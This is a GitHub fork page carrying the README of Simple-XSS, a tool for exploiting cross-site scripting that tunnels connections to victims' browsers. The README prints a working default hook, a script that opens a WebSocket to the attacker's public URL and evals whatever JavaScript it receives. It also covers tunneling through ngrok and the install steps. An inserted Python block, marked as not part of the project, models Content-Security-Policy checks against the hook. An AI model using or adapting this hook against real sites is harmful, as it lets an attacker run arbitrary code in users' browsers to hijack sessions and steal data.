cation-cmd / simple-xss

This project forked from crazyproger1/simple-xss

Simple-XSS is a multiplatform cross-site scripting (XSS) vulnerability exploitation tool.

License: MIT License

JavaScript 10.88% Python 88.99% HTML 0.13%

simple-xss's Introduction

Simple-XSS

Simple-XSS is a multi-platform cross-site scripting (XSS) vulnerability exploitation tool for pentesting. This application will help you create a hook that can easily and reliably catch a client by downloading a payload to their browser and executing it. You don't even need a public ("white") IP address for this, because the application will take care of tunneling the connection between you and the victim.

Disclaimer: This program is provided for educational and research purposes only. The creator of this program does not condone or support any illegal or malicious activity, and will not be held responsible for any such actions taken by others who may use this program. By downloading or using this program, you acknowledge that you are solely responsible for any consequences that may result from the use of this program.

Usage

Use the --help argument to get help.

GUI-Guide

First, choose the hook. The default hook is the simplest one; it is only suitable for forms without XSS protection:

Then choose the payload. The Hello World payload is an example payload; it just alerts "Hello, World!":

Now, let's set up tunneling. Tunneling is needed to make the local server public. You have 2 options:

  1. use one of the suggested tunneling apps (currently only ngrok)
  2. tunnel the ports yourself and pass the public URL of the HTTP tunnel to the program

Finally, you can run the process!

Now you can copy the hook and start hunting ;D

To demonstrate the possibilities, we can use the site xss-game.appspot.com. Enter the hook into the search form:

Press "Search". As you can see, we have the alert dialog!

Also, we have "Hello, World!" in our console.

Hook

Hooks folder: hooks

A hook is an HTML code snippet designed to be embedded in a form vulnerable to XSS. It looks like this:

<script>c = new WebSocket('{{environment.public_url}}');c.onmessage = (e) => eval(e.data);</script>

NOTE: As you can see, there is a built-in variable here: {{environment.public_url}}. You can read more about it below.

This is the default hook. When it's embedded in the vulnerable form, it downloads the JS code (payload) from the server via the WebSocket protocol and executes it using eval.
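Seen from the defending side, the default hook depends on three things that a page's Content-Security-Policy can each refuse: an inline script element, a WebSocket connection to the tunnel host, and eval. The following added example (not part of Simple-XSS) is a simplified model of CSP evaluation that reports which of those steps a given header stops; the function names and the host `tunnel.example` are assumptions made for illustration.

```python
# Added example (not Simple-XSS code): simplified CSP model for the default hook.
# Assumption: ws_host is the lowercase tunnel host and differs from the page's
# own host, so the 'self' keyword never matches it.

def parse_csp(header):
    """Parse a Content-Security-Policy header value into {directive: [sources]}."""
    policy = {}
    for part in header.split(";"):
        tokens = part.lower().split()
        if tokens and tokens[0] not in policy:  # browsers ignore duplicate directives
            policy[tokens[0]] = tokens[1:]
    return policy

def effective(policy, *chain):
    """Return the sources of the first directive present in the fallback chain."""
    for name in chain:
        if name in policy:
            return policy[name]
    return None  # nothing in the chain is set: the policy does not restrict this

def source_allows(source, host):
    """Does one connect-src source expression permit a WebSocket to host?"""
    if source in ("*", "ws:", "wss:", "http:", "https:"):
        return True  # deliberately permissive, so protection is never over-reported
    if source.startswith("'"):
        return False  # keywords such as 'self' or 'none'
    pattern = source.split("://")[-1].split("/")[0].split(":")[0]
    if pattern.startswith("*."):
        return host.endswith(pattern[1:])
    return pattern == host

def hook_steps_blocked(header, ws_host):
    """Report which of the hook's three steps the policy stops."""
    policy = parse_csp(header)
    elem = effective(policy, "script-src-elem", "script-src", "default-src")
    script = effective(policy, "script-src", "default-src")
    connect = effective(policy, "connect-src", "default-src")
    # A nonce or hash in the list makes browsers ignore 'unsafe-inline'.
    strict = elem is not None and any(
        s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for s in elem)
    return {
        "inline_script": elem is not None and ("'unsafe-inline'" not in elem or strict),
        "websocket": connect is not None
                     and not any(source_allows(s, ws_host) for s in connect),
        "eval": script is not None and "'unsafe-eval'" not in script,
    }
```

Any one blocked step is enough to break the hook, but a policy that blocks all three does not depend on a single directive staying correct.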

A hook has the following structure:

|
+-- hook_folder
    |
    +-- hook.html
    |
    +-- package.toml

hook.html - the main file; contains HTML code that can be embedded in a vulnerable form.

package.toml - the metadata file; contains data about the hook such as name, description, author and version.

Payload

Payloads folder: payloads

A payload is arbitrary JS code that is loaded by the hook on a vulnerable page and executed with eval.

A payload has the following structure:

|
+-- payload_folder
    |
    +-- payload.js
    |
    +-- package.toml
    |
    +-- init.py

payload.js - the main file; contains arbitrary JS code.

package.toml - the metadata file; contains data about the payload such as name, description, author and version.

init.py - a Python file, imported when the payload is loaded. It allows you to interact with the client side of the payload (payload.js) via the WebSocket protocol.

Templating

Built-in objects are objects passed into the hook and payload main files by the Jinja templating engine. They contain additional information that may be needed when loading a hook or payload.

Environment

  • public_url - public address of the WebSocket server

Metadata

package - hook or payload

  • name - name of package
  • author - package author
  • version - version of package
  • description - package description

If you need to use a variable, use the construction {{object.variable}}. For example:

alert('{{metadata.name}} - V{{metadata.version}}')

The provided payload code snippet will display an alert dialog showcasing the name and version of the payload.

Interface

Thanks to the use of the Python Flet framework, the application works equally well both in the browser and in the graphical interface.

Graphical

WEB

Command-Line

Installation

Windows

First you need to clone the repository:

git clone https://github.com/CrazyProger1/Simple-XSS

Then go to the folder & install requirements:

cd Simple-XSS
pip install -r windows_requirements.txt

And finally you can run it:

python main.py

Linux

First you need to clone the repository:

git clone https://github.com/CrazyProger1/Simple-XSS

Then go to the folder & install requirements:

cd Simple-XSS
pip install -r linux_requirements.txt

And finally you can run it:

python main.py

License

Simple-XSS is released under the MIT License. See the bundled LICENSE file for details.
